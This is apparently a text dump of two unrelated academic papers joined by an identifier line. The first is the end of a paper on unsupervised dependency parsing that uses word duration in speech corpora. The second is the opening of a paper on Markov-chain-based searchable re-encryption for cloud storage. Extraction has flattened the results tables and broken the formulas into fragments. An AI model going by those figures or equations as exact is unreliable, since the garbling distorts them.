from the same sections of the swbdnxt version of Switchboard used by Pate and Goldwater (2011). Short sentences are usually formulaic discourse responses (e.g. “oh ok”), so this dataset also excludes sentences shorter than three words. As our models successfully use word durations, this evaluation provides an important replication of the basic result from Pate and Goldwa- ter (2011) with a different kind of syntactic model. swbdnxt10 has a forced alignment of a dictionary-based phonetic transcription of each ut- terance to audio, providing our word duration infor- mation. As a very simple model of hyper-articulation and hypo-articulation, we classify a word as in the longest third duration, shortest third, or middle third. To minimize effects of word form, this classification was based on vowel count (counting a diphthong as one vowel): each word with n vowels is classified as in the shortest, longest, or middle tercile of duration among words with n vowels. Like wsj10, swbdnxt10 is annotated only with constituency parses, so to provide approximate “gold-standard” dependencies, we used the same constituency-to-dependency conversion tool as for wsj10. We evaluated 200 randomly-selected sen- tences to check the accuracy of the conversion tool, which was designed for newspaper text. Excluding arcs involving words with no clear role in depen- dency structure (such as “um”), about 86% of the arcs were correct. While this rate is uncomfortably low, it is still much higher than unsupervised depen- dency parsers typically achieve, and so may provide a reasonable measure of relative dependency parse quality among competing systems. 4.1.3 brent We also evaluated our models on the “Large Brent” dataset introduced in Rytting et al. (2010), a por- tion of the Brent corpus of child-directed speech (Brent and Siskind, 2001). We call this corpus brent. It consists of utterances from four of the mothers in Brent and Siskind’s (2001) study, and, like swbdnxt10, has a forced alignment from which we obtain duration terciles. Rytting et al. (2010) used a 90%/10% train/test partition. We extracted every ninth utterance from the original training partition to create a dev set, producing an 80%/10%/10% parti- tion. We also separated clitics from their base word. This dataset only has 186 sentences longer than ten words, with a maximum length of 22 words, so we discarded only sentences shorter than three words from the evaluation sets. The Brent corpus is distributed via CHILDES (MacWhinney, 2000) with automatic dependency an- notations. However, these are not hand-corrected, and rely on a different tokenization of the dataset than is present on the transcription tier. To produce a reliable gold-standard,6 we annotated all sentences of length 2 or greater from the development and test sets with dependencies drawn from the Stanford Typed Dependency set (de Marneffe and Manning, 2008) using the annotation tool used for the Copenhagen Dependency Treebank (Kromann, 2003). 4.2 Parameters In all experiments, hyperparameters for Proot , Pstop , and Pchoose (and their backed-off distributions, and including αUNK) were 1, αB was 10, and α¬B was 1. VBEM was run on the training set until the data log-likelihood changed by less than 0.001%, and then the parameters were held fixed and used to obtain Viterbi parses for the evaluation sentences. Finally, we explored different global UNK cutoffs, replacing each word that appeared less than c times with the token UNK. We ran each model for each c ∈ {0,1,25,50,100}, and picked the best-scoring c on the development set for running on the test set and presentation here. We used a harmonic initializer similar to the one in Klein and Manning (2004). 4.3 Evaluation In addition to evaluating the various incarnations of the DMV with backoff and input types, we compare to uniform branching baselines, the Common Cover Link (CCL) parser of Seginer (2007), and the Unsu- pervised Partial Parser (UPP) of Ponvert et al. (2011). The UPP produces a constituency parse from words 6Available at http://homepages.inf.ed.ac.uk/s0930006/brentDep/ and punctuation using a series of finite-state chun- kers; we use the best-performing (Probabilistic Right Linear Grammar) version. The CCL parser produces a constituency parse using a novel “Cover Link” rep- resentation, scoring these links heuristically. Both CCL and UPP rely on punctuation (though according to Ponvert et al. (2011), UPP less so), which our in- put is missing. The left-headed “LH” (right-headed “RH”) baseline assumes that each word takes the first word to its right (left) as a dependent, and corre- sponds to a uniform right-branching (left-branching) constituency baseline. We evaluate the output of all models in terms of both constituency scores and dependency accu- racy. Our wsj10 and swbdnxt10 corpora are originally annotated for constituency structure, with the dependency gold standard derived as described above, while our brent corpus is originally anno- tated for dependency structure, with the constituency gold standard derived by defining a constituent to span a head and each of its dependents (ignoring any one-word “constituents”). As the CCL and UPP parsers don’t produce dependencies, only con- stituency scores are provided. For constituency scores, we present the standard unlabeled Precision, Recall, and F-measure scores. For dependency scores, we present Directed attach- ment accuracy, Undirected attachment accuracy, and the “Neutral Edge Detection” (NED) score intro- duced by Schwartz et al. (2011). Directed attachment accuracy counts an arc as a true positive if it correctly identifies both a head and a dependent, whereas undi- rected attachment accuracy ignores arc direction in counting true positives. NED counts an arc as a true positive if it would be a true positive under the Undi- rected attachment score, or if the proposed head is the gold-standard grandparent of the proposed depen- dent. This avoids penalizing parses for flipping an arc, such as making determiners, rather than nouns, the head of noun phrases. To assess statistical significance, we carried out stratified shuffling tests, with 10,000 random shuf- fles, for all measures. Tables indicate significance differences between the backoff models and the most competitive baseline model on that measure, indi- cated by an italic score. A star (∗) indicates p < 0.05, and a dagger (†) indicates p < 0.01. To see the direc- tion of a significant difference (i.e. whether backoff wsj10 swbdnxt10 Dependency Constituency Dependency Constituency UNK Dir. Undir. NED P R F UNK Dir. Undir. NED P R F E M Wds 25 32.5 52.5 67.0 49.5 48.5 49.0 25 30.6 50.9 66.8 45.4 47.1 46.3 POS — 46.4 63.8 78.1 59.2 58.1 58.6 — 53.0 65.0 76.8 52.5 52.9 52.7 V B Wds 25 29.4 52.4 70.5 51.3 52.6 52.0 25 36.1 54.9 72.7 49.0 50.0 49.5 POS — 43.5 61.9 77.3 59.7 57.1 58.4 — 51.3 62.5 74.3 47.1 46.6 46.8 W ds + P O S Cond. 50 49.9† 66.1† 79.6∗ 64.2† 61.9† 63.0† 100 45.5† 62.4† 77.8 58.4† 58.9† 58.7† Joint 50 46.0 63.7 79.0 62.0† 59.1 60.5∗ 1 49.4† 63.7 79.6† 60.0† 52.9 56.3† Indep. 25 52.5† 68.0† 83.5† 63.5† 61.5† 62.5† 100 55.7† 65.8 74.6† 61.5† 57.9† 59.6† LH — 26.0 55.8 74.3 53.1 69.6 60.3 — 24.1 50.8 72.7 60.8 82.5 70.0 RH — 31.2 56.4 61.4 25.8 33.8 29.3 — 29.2 52.0 57.9 22.2 30.1 25.5 CCL — — — — 50.8 40.7 45.2 — — — — 53.6 47.4 50.3 UPP — — — — 52.8 37.2 43.7 — — — — 60.0 46.6 52.4 Table 2: Performance on wsj10 and swbdnxt10 for models using words and POS tags only. Bold scores indicate the best performance of all models and baselines on that measure. † Significantly different from best non-uniform baseline (italics) by a stratified shuffling test, p < 0.01; ∗: p < 0.05. model is better or worse than the baseline), look to the scores themselves. 5 Results In all results, when a model sees only one kind of information, that is expressed by writing out the ab- breviation for the relevant stream: “Wds” for words, “POS” for Part-Of-Speech, “Dur” for word duration. For baseline models that see two streams, the abbre- viations are joined by a “×” symbol (as they treat input pairs as atoms drawn in the cross-product of the two streams’ vocabulary). For the backoff models, the abbreviations are joined by a “+” symbol (as they combine the information sources with a weighted sum), with the “extra” stream name first. 5.1 Results: wsj10 The left half of Table 2 presents results on wsj10. For the baseline models, the first column with hori- zontal text indicates the input, while for the backoff (Wds+POS) models, the first column with horizontal text indicates whether and how the extra stream is modeled in dependents (as described in Section 3.3). The EM model with POS input is largely a repli- cation of the original DMV, differing in the use of separate train, dev, and test sets, and possibly the details of the harmonic initializer. Our replication achieves an undirected attachment score of 63.8 on the test set, similar to the score of 64.5 reported by Klein and Manning (2004) when training and evalu- ating on all of wsj10. Cohen et al. (2008) use the same train/dev/test partition that we do, and report a directed attachment score of 45.8, similar to our directed attachment score of 46.4. The VB model which learns from POS tags does not outperform the EM model which learns from POS tags, suggesting that data sparsity does not hurt the DMV when using POS tags. As expected, the words- only models perform much worse than both the POS input models and the uniform LH baseline. VB does improve the words-only constituency performance. The Cond. and Indep. backoff models outperform the POS-only baseline on all measures, but the Joint backoff model does not demonstrate a clear advan- tage over the POS-only baseline on any measure. The success of the Indep. model indicates that modelling dependent word identity does provide enough infor- mation to justify the increase in sparsity. The failure of the Joint model to provide a further improvement indicates that the extra information in the full joint over dependents does not justify the large increase in parameters. We also see that several models out- perform the LH baseline on dependencies, but the advantage is much less in F-Score, underscoring the loss of information in the conversion of dependen- cies to constituencies. Finally, all models outperform CCL and UPP on F-score, emphasizing their reliance on the punctuation we removed. Dependency Constituency UNK Dir. Undir. NED P R F E M Wds 25 30.6 50.9 66.8 45.4 47.1 46.3 Wds×Dur 25 26.1 46.5 62.0 45.6 48.7 47.1 V B Wds 25 36.4 55.1 73.0 49.1 50.0 49.6 Wds×Dur 25 31.8 51.7 71.3 49.2 55.9 52.3 D ur + W ds Cond. 25 32.6† 55.1 74.5† 59.1† 71.4† 64.7† Joint 50 31.8† 51.8† 70.8∗ 54.4† 60.5† 57.3† Indep. 50 40.3† 59.1† 76.0† 56.1† 61.7† 58.8† LH — 24.1 50.8 72.7 60.8 82.5 70.0 RH — 29.2 52.0 57.9 22.2 30.1 25.5 CCL — — — — 53.6 47.4 50.3 UPP — — — — 60.0 46.6 52.4 ● ● 45 50 55 60 4 5 5 0 5 5 6 0 6 5 7 0 7 5 Switchboard Model Performance Undirected Attachment Score C o n st itu e n cy F − sc o re ● ● Wds WdsxDur Cond. Joint Indep. LH Table 3: Performance on swbdnxt10 for models using words and duration. The scatterplot includes a subset of the information in the table: F-score and undirected attachment accuracy for backoff models and VB and LH baseline. Bold, italics, and significance annotations as in Table 2. 5.2 Results: swbdnxt10 The right half of Table 2 presents performance fig- ures on swbdnxt10 for input involving words and POS tags. As expected, the EM and VB baselines perform best when learning from gold-standard POS tags, and we again see no benefit for the VB POS- only model compared to the EM POS-only model. The POS-only baselines far outperform the uniform- attachment baselines on the dependency measures; to our knowledge this is the first demonstration outside the newspaper domain that the DMV outperforms a uniform branching strategy on these measures. The other comparisons among systems listed in Table 2 are largely inconclusive. Models do com- paratively well on either the constituency or depen- dency evaluation, but not both. The backoff mod- els outperform the baseline POS-only models in the constituency evaluation, but underperform or match those same models in the dependency evaluation. Conversely, most models outperform the LH base- line in the dependency evaluation, but not in the constituency evaluation. There are probably two causes for the ambiguity in these results. First, the noise in the dependency gold-standard may have over- whelmed any advantage from backoff. Second, as we saw with wsj10, the conversion from dependencies to constituencies removes information, which may explain the failure of any model to outperform the LH baseline in the constituency evaluation. Table 3 presents performance figures on swbdnxt10 for input involving words and duration, including a scatter-plot of Undirected attachment against constituency F-Score for the interesting comparisons. In the scatter-plot, models up and to the right performed better, and we see that the negative correlation between the dependency and constituency evaluations persists in words and dura- tion input. VB substantially outperforms EM in the baselines, indicating that good smoothing is helpful when learning from words. Other comparisons are again ambiguous; the dependency evaluation is noisy, and backoff models outperform baseline models on the constituency evaluation but not the LH baseline. Still, the backoff models outperform all words-only baselines in constituency score, with two performing slightly worse in dependency score and one performing much better. So there is some evidence that word duration is useful, but we will find clearer evidence on the brent corpus. 5.3 Results: brent Table 4 presents results on the brent dataset. VB is even more effective than in the other datasets for improving performance among baseline models, lead- ing to double-digit improvements on some measures. Moreover, the best dev-set UNK cutoff drops to 1 for all VB models, indicating that, on this dataset, VB provides good smoothing even in models without backoff. This difference between datasets is likely related to differences in vocabulary diversity; the Dependency Constituency UNK Dir. Undir. NED P R F E M Wds 25 36.9 56.3 70.7 52.4 69.5 59.8 Wds×Dur 25 31.3 51.1 66.9 50.7 64.7 56.9 V B Wds 1 51.2 64.2 77.3 63.3 68.1 66.0 Wds×Dur 1 47.0 60.5 74.0 66.2 64.9 65.5 D ur + W ds Cond. 1 53.1∗ 65.5∗ 78.7∗ 65.4 68.6 67.0∗ Joint 1 50.7 63.0 76.3 65.6 65.4† 65.5 Indep. 1 53.2 66.7† 79.6† 61.5† 67.9 64.5 LH — 28.3 53.6 78.3 47.9 85.6 61.4 RH — 27.2 48.8 61.1 26.2 46.8 33.6 CCL — — — — 41.7 58.8 48.8 UPP — — — — 56.8 63.8 60.1 ● ● 50 55 60 65 70 6 0 6 2 6 4 6 6 6 8 7 0 Brent Model Performance Undirected Attachment Score C o n st itu e n cy F − sc o re ● ● Wds WdsxDur Cond. Joint Indep. LH Table 4: Performance on brent for models using words and duration. The scatterplot includes a subset of the information in the table: F-score and undirected attachment accuracy for backoff models and VB and LH baseline. Bold, italics, and significance annotations as in Table 2. type:token ratio in the brent training set is about 1:15, compared to 1:5 and 1:9 in the wsj10 and swbdnxt10 training sets, respectively. More importantly for our main hypothesis, all three backoff models using words and duration out- perform the words-only baselines (including CCL and UPP) on all dependency measures—the most accurate measures on this corpus, which has hand- annotated dependencies—and the Cond. model also wins on F-score. 6 Conclusion In this paper, we showed how to use the DMV with Backoff and two fully-generative variants to explore the utility of word duration in fully lexicalized un- supervised dependency parsing. Although other re- searchers have incorporated features beyond words and POS tags into DMV-like models (e.g., semantics: Naseem and Barzilay (2011); morphology: Berg- Kirkpatrick et al. (2009)), we believe this is the first example based on Headden et al. (2009)’s backoff method. As far as we know, our work is also the first test of a DMV-based model on transcribed conver- sational speech and the first to outperform uniform- branching baselines without using either POS tags or punctuation in the input. Our results show that fully- lexicalized models can do well if they are smoothed properly and exploit multiple cues. Our experiments also suggest that CDS is espe- cially easy to learn from. Model performance on the brent dataset was generally higher than on swbdnxt10, with a much lower UNK threshold. This latter point, and the fact that brent has a much lower word type/token ratio than the other datasets, suggest that CDS provides more and clearer evidence about words’ syntactic behavior. Finally, our results provide more evidence, using a different, more powerful syntactic model than that of Pate and Goldwater (2011), that word duration is a useful cue for unsupervised parsing. We found that several ways of incorporating duration were use- ful, although the extra sparsity of Joint emissions was not justified in any of our investigations. Our results are consistent with both the prosodic and pre- dictability bootstrapping hypotheses of language ac- quisition, providing the first computational support for these using a full syntactic parsing model and tested on child-directed speech. While our models do not provide a mechanistic account of how children might use duration information to help with learning syntax, they do show that this information is useful in principle, even without any knowledge of latent prosodic structure or its relationship to syntax. In ad- dition, our results suggest it may be useful to explore using word duration to enrich NLP tasks in speech- related technologies, such as syntactically-inspired language models for text-to-speech generation. In the future, we also hope to investigate why duration is helpful, designing experiments to tease apart the role of prosody and predictability in learning syntax. References Matthew Aylett and Alice Turk. 2004. The smooth signal redundancy hypothesis: A functional explanation for re- lationships between redundancy, prosodic prominence, and duration in spontaneous speech. Language and Speech, 47(1):31–56. Mary Beckman and Janet Pierrehumbert. 1986. Intona- tional structure in Japanese and English. Phonology Yearbook, 3:255–309. Alan Bell, Jason M Brenier, Michelle Gregory, Cynthia Girand, and Dan Jurafsky. 2009. Predictability effects on durations of content and function words in conver- sational English. Journal of Memory and Language, 60:92–111. Taylor Berg-Kirkpatrick, Alexandre Bouchard-Côté, John DeNero, and Dan Klein. 2009. Painless unsupervised learning with features. In Proceedings of NAACL. Michael R Brent and Jeffrey M Siskind. 2001. The role of exposure to isolated words in early vocabulary de- velopment. Cognition, 81:31–44. Christos Christodoulopoulos, Sharon Goldwater, and Mark Steedman. 2012. Turning the pipeline into a loop: Iterated unsupervised dependency parsing and PoS in- duction. In Proceedings of the NAACL-HLT Workshop on the Induction of Linguistic Structure, pages 96–99, Montréal, Canada, June. Association for Computational Linguistics. Shay B Cohen and Noah A Smith. 2009. Shared lo- gistic normal distributions for soft parameter tying in unsupervised grammar induction. In Proceedings of NAACL. Shay B Cohen, Kevin Gimpel, and Noah A Smith. 2008. Logistic normal priors for unsupervised probabilistic grammar induction. In Advances in Neural Information Processing Systems 22. Shay B Cohen, Dipanjan Das, and Noah A Smith. 2011. Unsupervised structure prediction with non-parallel multilingual guidance. In Proceedings of EMNLP. Marie-Catherine de Marneffe and Christopher D Manning. 2008. Stanford typed dependencies manual. Technical report. Markus Dreyer and Izhak Shafran. 2007. Exploiting prosody for pcfgs with latent annotations. In Proceed- ings of Interspeech, Antwerp, Belgium, August. Susanne Gahl and Susan M Garnsey. 2004. Knowledge of grammar, knowledge of usage: Syntactic probabilities affect pronunciation variation. Language, 80:748–775. Susanne Gahl, Susan M Garnsey, Cynthia Fisher, and Laura Matzen. 2006. “That sounds unlikely”: Syntac- tic probabilities affect pronunciation. In Proceedings of the 27th meeting of the Cognitive Science Society. Lila Gleitman and Eric Wanner. 1982. Language acqui- sition: The state of the art. In Eric Wanner and Lila Gleitman, editors, Language acquisition: The state of the art, pages 3–48. Cambridge University Press, Cam- bridge, UK. Will Headden, Mark Johnson, and David McClosky. 2009. Improved unsupervised dependency parsing with richer contexts and smoothing. In Proceedings of NAACL- HLT. Zhongqiang Huang and Mary Harper. 2010. Appropri- ately handled prosodic breaks help PCFG parsing. In Proceedings of NAACL-HLT, pages 37–45, Los Ange- les, California, June. Association for Computational Linguistics. Richard Johansson and Pierre Nugues. 2007. Extended constituent-to-dependency conversion for english. In Proceedings of NODALIDA 2007. Mark Johnson. 2007. Why doesn’t EM find good HMM POS-taggers. In Proceedings of EMNLP-CoNLL, pages 296–305. Jeremy G Kahn, Matthew Lease, Eugene Charniak, Mark Johnson, and Mari Ostendorf. 2005. Effective use of prosody in parsing conversational speech. In Proceed- ings of HLT-EMNLP, pages 233–240. Dan Klein and Christopher D. Manning. 2004. Corpus- based induction of syntactic structure: Models of de- pendency and constituency. In Proceedings of ACL, pages 479–486. Matthias Trautner Kromann. 2003. The Danish Depen- dency Treebank and the DTAG treebank tool. In Pro- ceedings of the Second Workshop on Treebanks and Linguistic Theories, pages 217–220. Kenichi Kurihara and Taisuke Sato. 2006. Variational Bayesian grammar induction for natural language. In Proceedings of the International Colloquium on Gram- matical Inference, pages 84–96. Brian MacWhinney. 2000. The CHILDES project: Tools for analyzing talk. Lawrence Erlbaum Associates, Mah- wah, NJ, third edition. Séverine Millotte, Roger Wales, and Anne Christophe. 2007. Phrasal prosody disambiguates syntax. Lan- guage and Cognitive Processes, 22(6):898–909. James L Morgan, Richard P Meier, and Elissa L Newport. 1987. Structural packaging in the input to language learning: contributions of prosodic and morphologi- cal marking of phrases to the acquisition of language. Cognitive Psychology, 19:498–550. Tahira Naseem and Regina Barzilay. 2011. Using seman- tic cues to learn syntax. In Proceedings of AAAI. John K Pate and Sharon Goldwater. 2011. Unsupervised syntactic chunking with acoustic cues: computational models for prosodic bootstrapping. In Proceedings of the 2nd ACL workshop on Cognitive Modeling and Computational Linguistics. Elias Ponvert, Jason Baldridge, and Katrin Erk. 2011. Simple unsupervised grammar induction from raw text with cascaded finite state models. In Proceedings of ACL-HLT. Patti J Price, Mari Ostendorf, Stefanie Shattuck-Hufnagel, and Cynthia Fong. 1991. The use of prosody in syntac- tic disambiguation. In Proceedings of the HLT work- shop on Speech and Natural Language, pages 372–377, Morristown, NJ, USA. Association for Computational Linguistics. C Anton Rytting, Chris Brew, and Eric Fosler-Lussier. 2010. Segmenting words from natural speech: subseg- mental variation in segmental cues. Journal of Child Language, 37(3):513–543. Roy Schwartz, Omri Abend, Roi Reichart, and Ari Rap- poport1. 2011. Neutralizing linguistically problematic annotations in unsupervised dependency parsing evalu- ation. In Proceedings of the 49th ACL, pages 663–672. Yoav Seginer. 2007. Fast unsupervised incremental pars- ing. In Proceedings of ACL. Amanda Seidl. 2007. Infants’ use and weighting of prosodic cues in clause segmentation. Journal of Mem- ory and Language, 57(1):24–48. Valentin I Spitkovsky, Hiyan Alshawi, Angel X Chang, and Daniel Jurafsky. 2011a. Unsupervised dependency parsing without gold part-of-speech tags. In Proceed- ings of EMNLP. Valentin I Spitkovsky, Hiyan Alshawi, and Daniel Jurafsky. 2011b. Punctuation: Making a point in unsupervised dependency parsing. In Proceedings of CoNLL. Harry Tily, Susanne Gahl, Inbal Arnon, Neal Snider, Anubha Kothari, and Joan Bresnan. 2009. Syntactic probabilities affect pronunciation variation in sponta- neous speech. Language and Cognition, 1(2):147–165. work_3he56nupl5gqtpkwpkewfgko54 ---- l 引言 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-004 29 Searchable Re-encryption Cloud Storage Method Based on Markov Chain Wang Hui a , Wang ZhongSheng b School of Computer Science and Engineering, Xi’an Technological University, Xi’an, 710021, China e-mail: a 277019826@qq.com; b 59483672@qq.com Li Jinguang Department of Information Technology Shaanxi Heavy Duty Automobile CO.LTD Xi 'an, 710200, Shaanxi, China Abstract—Cloud storage is an emerging paradigm that offers on-demand, flexible, and elastic computational and storage services for the terminal users. When the large amount of data increases dramatically, the storage efficiency of the system would be decreased seriously. In this paper a new method of SReCSM(Searchable Re-encryption Cloud Storage Method) based on Markov chain is proposed. It predicts periodically by using the steady Markov strategy in stages and easy to select the optimal storage node. The data is scheduled to store in the node with the lowest cost in real time, and the node is selected to implement cloud storage access on mobile terminal. By using searchable re-encryption method, SReCSM has increased the storage requirement flexibility and minimize cost and searching time. And then the reliability model of SReCSM is established. Simulation results show that SReCSM introduced in this paper has the ability to predict accurately when the size of the data is different. Moreover, the influence of storage efficiency is reduced effectively through SReCSM when different size of the data is stored in storage nodes regardless of the storage cost. It is verified that the SReCSM based on Markov chain has higher reliability. Keywords-Cloud Storage; Markov Chain; Re-encryption; Reliability Model I. INTRODUCTION In order to meet the various storage demands, cloud storage is designed to store data in cloud and is widely used in the Internet. Compared with traditional data storage, it greatly improves the efficiency of the mass data storage and utilization of network resource. However, access from a mobile device to data, stored in a cloud, leads to poor client quality experience [1-3]. It is essential to reduce user download wait time for a requested file from a network to enhance client quality experience. As a result, cloud storage techniques are quite challenging. On one hand, storage density of the cloud storage is not big and the comprehensive storage efficiency is low. On the other hand, the high latency limited the use of mobile cloud storage, especially for the applications with frequent random accesses to a large set of small files. Therefore, cloud storage faces serious security and efficient problems [4-6]. Traditional cloud storage systems do not adapt well to different application environment and does not guarantee the integrity and confidentiality of cloud data. In other words, the cloud storage service does not guarantee that the data and operation of mobile users will not be lost, damaged, leaked, or illegally exploited by malicious or nonmalicious. Therefore, it's very dangerous for sensitive data to be stored directly in the cloud. The reliability of the mobile cloud storage depends on the extent of the impact on system storage efficiency while the storage solution fails [7]. Therefore, storing sensitive data on untrusted server is a challenging issue [8]. Simple encryption techniques have key management issues and which can't support complex requirements such as query, parallel modification, and fine-grained authorization. To guarantee confidentiality and proper access control of sensitive data, classical encryption are used [9-10]. To solve the problems brought by the hysteretic and density of tranditional storage methods in the cloud storage system, in this paper, SReCSM, Searchable Re-encryption mailto:a.author@email.com International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 30 Cloud Storage Method is proposed using the idea of Markov chain. In this method, instead of using traditional storage, a proactive storage approach is adopted to avoid delayed storage. In addition, the SReCSM predicts periodically to increase the effiency of cloud storage. The major contribution of our work includes:  Searchable Re-encryption Cloud Storage Method based on Markov chain is proposed and built as a SReCSM model. In order to find out the optimal storage policy in the cloud, an optimization problem is formulated as a Markov chain. The SReCSM model is designed to predict periodically by using the steady Markov strategy in stages and determine the lowest storage cost by which the storage benefit can be maximized.  A value iteration algorithm of SReCSM is presented for computing the stationary deterministic policy. The data is scheduled to be stored in the node with the lowest storage cost in real time. Therefore, the optimal storage node must be selected to implement cloud storage access on mobile terminal.  The central idea of the searchable re-encryption is proposed, which is to generate a re-encryption key and decrypt while the keyword matched. The objective of the proposed searchable re-encryption method is to increase the storage requirement, flexibility and reduce the security issues, overhead ratio and minimize the cost and searching time.  The reliability of SReCSM model is proposed and analyzed. Because of the large scale of the cloud storage system, method of Monte Carlo simulation is adopted in the reliability evaluation of the cloud storage system.  We conduct a series of experiment to validate the effectiveness, performance and robustness of SReCSM. Results show that the present approach can store mass data in cloud system effectively and securitily. The rest of the paper is organized as follows. In section 2, related work is discussed. Section 3, Searchable Re-encrypption Cloud Storage Method based on Markov Chain is proposed. Section 4 describes the searchable re-encryption method in SReCSM. Section 5 presents the basic prototype system of SReCSM and simulation experiments. In addition, the security, performance and robustness of SReCSM are analyzed. Section 6 concludes the paper. II. RELATED WORK Efforts have been taken by researchers, developers, practitioners, and educators to identify and discuss the technical challenges and recent advances related to cloud storage. Han et al. proposed [11] multi-path data prefetching in mobile cloud storage. Multi-Path prefetching tend to prefetch more successors to ensure high prefetching hit rate and efficiency, and achieve a higher overall throughput performance of accessing cloud storage services via mobile network. Based on cloud storage, Lee et al. [12] designed an efficient delta synchronization (EDS) algorithm for mobile cloud storage applications, which can aggregates the updated data to reduce the synchronization traffic and synchronizes the aggregate done periodically to satisfy the consistency. Wang et al. [13] presented an Optimized Replica Distribution Method (ORDM) in cloud storage system. Zhang et al. [14] conducts modeling analysis of a cloud storage system, and proposes a Markov decision process modeling framework to analyze the reliability of the storage system. Chen et al. [15] proposed a new metric called joint response time, which not only considers the waiting time when the requested data are unavailable but also the queuing delay and service time when data become available. These methods mentioned above achieve cloud storage, but the cloud storage according to data size based on Markov is not considered. Aiming at the problem that the cloud storage according to data size based on Markov, SReCSM is proposed in this paper to satisfy the cloud storage periodically. Most of the existing security schemes that are designed for mobile cloud storage environment are based on traditional cryptographic methods or pairing-based cryptography. The further deployment of cloud storage is limited by its security risks. The schemes presented in International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 31 [17-19], and [20, 25] provided the security features for mobile user in the cloud environment using the traditional cryptography methods. The rest of the security schemes discussed in [21-23], and [24] are based on pairing based cryptography for secure offloading of the data access operations on the cloud in a trusted mode. Few of the schemes presented in the classification execute the entire security operations on the mobile device. The rest of the schemes delegate the security management operations on the cloud, trusted entity under the control of client organization, or trusted entity ender the control of the third party. In the category of local execution, a small number of schemes focus on the reduction of computational complexity of cryptography algorithms for reducing the processing burden from the mobile device. Zhao et al. [17] proposed a method for trusted data sharing on untrused cloud servers using Progressive Elliptic Curve Encryption(PECE) scheme. The PECE allows the encryption of message multiple times with different keys that can be decrypted in a single run with a single key. Ren et al. [20] provide the security features for mobile user in the cloud environment using the traditional cryptography methods. The focus of the proposed schemes is to reduce the computational complexity of the cryptography operations instead of offloading the computationally intensive operations on the cloud. The size of the ciphertext grows linearly with increase in number of ciphertext attributes. [26] that involves more pairing evaluation exponential operations while decrypting the ciphertext. However, the data owner has to transform the plaintext into ciphertext, and vice versa that involves execution of computationally intensive multiplication and exponential operations of large numbers on resouce constraion mobile device. [27-31] propose proxy re-encryption algorithm to confirm the security of the data in the cloud, which can alleviate the client's burden, and enhance the confidentiality of cloud data. However, there are two major disadvantages with these techniques. First, for re-encryotion, the data owner must obtain user's public key before uploading. Second, because the same plaintext is used with different keys generated by proxy, therefore, the storage overhead becomes excessive. A manager-based re-encryption scheme (MReS) defined in [16] achieves the data confidentiality for the mobile users by using the proxy re-encryption strategy. The proxy re-encryption helps the mobile user to delegate the data access operation on third party. Another cryptographic scheme defined by Tysowski and Hasan in [16] is cloud-based re-encryption scheme (CReS). The proposed scheme covers the limitations of the existing manager-based re-encryption scheme and the variations of manager-based re-encryption based on user-managed key ciphertext fetch by user. But these two schemes are more complex and need more time to re-encrypt. To optimize the cloud storage, safety transmission, minimize the cost and computational complexity, here we have proposed a new scheme as searchable re-encrypted data in SReCSM. This technique is more simple and faster when sorting the arrays using the most significant radix sort. This technique will reduce the cost of the data owners up to O(Nt*3) and the time complexity will be reduced up to the O (B), where B denotes the Bucket size of the data base. III. CONSTRUCTION OF SRECSM MODEL The transfer probability of Markov chain is introduced into the cloud storage. The stored procedure in the cloud system is similar to the Markov process. Therefore, a Searchable Re-encryption Cloud Storage Method based on Markov Chain is proposed in this paper, which can realize reliable and safe storage on mobile terminal. From the probability point of view, the data is scheduled to be stored in the node with the lowest storage cost in real time. Firstly, the storage state of SReCSM is divided and three state models are obtained in the paper. According to the storage cost of the nodes for storing different size file, the state matrix in current time is got by using the steady state of Markov strategy. The state transfer probability matrix is calculated with the support of a sufficient number of samples. The storage state probability of SReCSM can be predicted quickly in the future. Therefore, the optimal International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 32 storage node is selected to implement cloud storage access on mobile terminal. When a request is made by a mobile terminal, the storage node which has the lowest cost is selected for storing. The SReCSM can save time and improve storage efficiency effectively. And at the same time the load balancing of the system is also guaranteed. A. The finite state space and the state distribution The Markov chain is a discrete random process with Markov properties. The next state of the random process is only related to the current state, not its historical state. Therefore, the distribution of the future state of the random process depends only on the present, not the past. The SReCSM based on Markov chains consists of the following three parts  PRS ,, . In which S is the finite state space; R stands for the state distribution; P is the probability of state conversion. The server in the cloud storage group is named storage node. Each node can store large files, medium files, and small files. Files stored over 100MB is called a large file, files no more than10MB are defined as small files, files between 10MB and 100MB are defined as secondary files. The storage nodes are different in hardware performance, load situation, network link state and so on. Therefore, each storage node has different storage cost for storing large data, secondary data, and small data. That is, the storage cost for storing different size of files in each node is different. In the cloud system, depending on the size of the storage data file, each node has different storage costs for large, secondary and small files, and then the optimal storage node is selected accordingly. Based on the analysis above, the SReCSM based on Markov Chain is proposed in this paper. The processes of the storage that store three different sizes of data in a storage cluster are treated as space S which is discrete state. Moreover, in the procedures of data storing, the selection of the next storage node is only related to the storage cost of the current storage node. Therefore, the data stored procedure of cloud system conforms to the characteristics of Markov chain. In the SReCSM proposed in this paper, the state space S is expressed as the following three types. State 1 (Small file status): In the state of small file status, the optimal storage node for storing small files in a storage group cluster is selected to implement data storage. State 2 (Secondary file status): In the state of secondary file status, the optimal storage node for storing secondary files in a storage group cluster is selected to implement data storage. Secondary files are between a small file and a large file. State 3 (Large file status): In the state of large file status, the optimal storage node for storing large files in a storage group cluster is selected to implement data storage. The state space of the cloud storage based on Markov chain is defined in formula (1).    321 ,, sssS   In formula (1), 1 s denote the storage cost for storing small file on each storage node in the cluster, 2 s denote the storage cost for storing secondary file on each storage node in the cluster, and 3 s denote the storage cost for storing large file storage on each storage node in the cluster. Moreover, according to the probability rule, the more detailed the storage state of the cloud storage system is, the more explicit the guidance of the data storage solution prediction will be. However, the greater the burden of computing resources needed for partitioning the state of the cloud system storage scheme. As we can see, in implementing the choice of cloud storage solutions, the degree of partitioning the storage state in cloud system storage scheme is a compromise decision problem. The more detailed the storage state is the more simplification is needed to reduce the computational burden. And the more storage states are, the greater the redundancy of the storage scheme. Therefore, the approach of partitioning the storage state not only complicates the analysis, but also reduces International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 33 storage speed. In fact, storage status can't be considered completely, and it is difficult for the SReCSM to achieve multiple storage state ultimately. Therefore, in the study of the SReCSM, the partitioning of the storage state is appropriate. Obviously, the storage state defined in this paper can be divided into three state, those are large file status, middle file status and small file status. Whether for the actual data of the project or the simulation analysis, these three states are relatively simple and can better satisfy the requirement of data storage in cloud system. The storage group has an irregular connection to the network. 